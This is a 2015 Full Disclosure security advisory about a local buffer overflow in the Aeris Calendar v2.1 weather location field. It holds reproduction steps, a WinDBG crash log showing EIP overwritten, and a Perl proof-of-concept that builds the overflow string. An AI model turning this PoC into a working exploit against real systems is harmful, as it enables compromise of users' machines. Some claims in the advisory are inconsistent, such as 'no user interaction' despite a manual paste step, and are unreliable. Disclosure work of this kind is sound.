[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Aeris Calandar v2.1 - Buffer Overflow Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2015-12-22 15:07:36
Message-ID: 56796738.4020509 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Aeris Calandar v2.1 - Buffer Overflow Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1656
Release Date:
=============
2015-12-01
Vulnerability Laboratory ID (VL-ID):
====================================
1656
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Aeris Calendar is a full-featured desktop calendar with current weather conditions, forecasts \
and severe weather alerts. Aeris Calendar allows you to add reminders, notes, todo`s and \
special events like birthdays and anniversaries. The extended forecast is displayed directly \
on the calendar and current conditions are displayed on the calendar, tray icon and desklet. \
Themes allow you to skin the calendar or you can select any image on your computer to serve as \
the backdrop for your calendar.
(Copy of the Vendor Homepage: http://www.esumsoft.com/products/aeris-calendar/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a local buffer overflow web \
vulnerability in the official Aeris Calandar v2.1 software.
Vulnerability Disclosure Timeline:
==================================
2015-12-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Esumsoft
Product: Aeris Calendar - Software 2.1
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local unicode buffer overflow has been discovered in the official Aeris Calandar v2.1 \
software. The local vulnerability allows to overwrite the registers of the software process to \
compromise the target computer system.
The classic buffer overflow vulnerability is located in the software Aeris CaLandar an attacker \
manipulate the bit EIP register in order to execute the next instruction of their choice. \
Attacker can for example execute arbitrary codes. The attacker includes a large unicode string \
to overwrite the EIP register of the process. Finally the attacker is able to compromise the \
system process of the active program.
The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common \
vulnerability scoring system) count of 6.4. Exploitation of the vulnerability requires a low \
privilege system user account and no user interaction. Successful exploitation of the local \
vulnerability results in system compromise by elevation of privileges via overwrite of the \
registers (EIP,EBP & ECX Co.).
Vulnerable Module(s):
[+] Weather -> Set Location > Input <> [Search]
Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system \
user account and without user interaction. For security demonstration or to reproduce the \
vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Launch Aeris Calandar.exe
2. Click Weather -> Set Location
3. Copy the AAAA...+ string from bof.txt to clipboard
4. Paste it the input Enter your city or zip code and press search AAAA....+ string > click \
Search 5. Software will crash with a BEX exception
6. Successful reproduce of the local buffer overflow vulnerability!
--- Debug Session Logs [WinDBG] ---
Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=43434343 edx=77ce72cd esi=00000000 edi=00000000
eip=43434343 esp=0012cbe8 ebp=0012cc08 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
43434343 ?? ???
0:000> !exchain
0012cbfc: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012cfe4: ntdll!RtlRaiseStatus+c8 (77ce72cd)
0012f404: 43434343
Invalid exception stack at 42424242
0:000> d 0012f404
0012f404 42 42 42 42 43 43 43 43-00 00 00 00 80 32 44 00 BBBBCCCC.....2D. <== Control \
Register EIP 0012f414 a0 e6 1e 0b 01 00 00 00-08 be 51 00 60 f5 12 00 ..........Q.`...
0012f424 11 01 00 00 dd 92 38 00-fe ff ff ff c3 60 cf 77 ......8......`.w
0012f434 d0 5d cf 77 10 00 00 00-00 00 00 00 00 00 00 00 .].w............
0012f444 00 00 22 00 00 00 00 00-00 00 00 00 f4 f4 12 00 ..".............
0012f454 00 04 00 00 c0 01 05 00-f4 f4 12 00 00 00 00 00 ................
0012f464 fe ff ff ff fe c5 7f 77-94 52 7f 77 04 00 00 00 .......w.R.w....
0012f474 f2 64 4e 00 72 01 04 00-e7 c4 7f 77 c0 01 05 00 .dN.r......w....
PoC: Perl Exploit (*.pl)
my $Buff = "\x41" x 8186;
my $Buff1 = "\x42" x 4;
my $Buff2 = "\x43" x 4;
open(MYFILE,'>>File.txt');
print MYFILE $Buff.$Buff1.$Buff2;
close(MYFILE);
print " POC Created by ZwX\n";
Solution - Fix & Patch:
=======================
Restrict the input of the location module to prevent local buffer overflows in that same \
module. Setup an specific input size to ensure no overflow occurs during the active search.
Security Risk:
==============
The security risk of the local buffer overflow vulnerability in the calandar software for \
windows is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
ZwX - (http://zwx.fr) [ http://www.vulnerability-lab.com/show.php?user=ZwX ]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic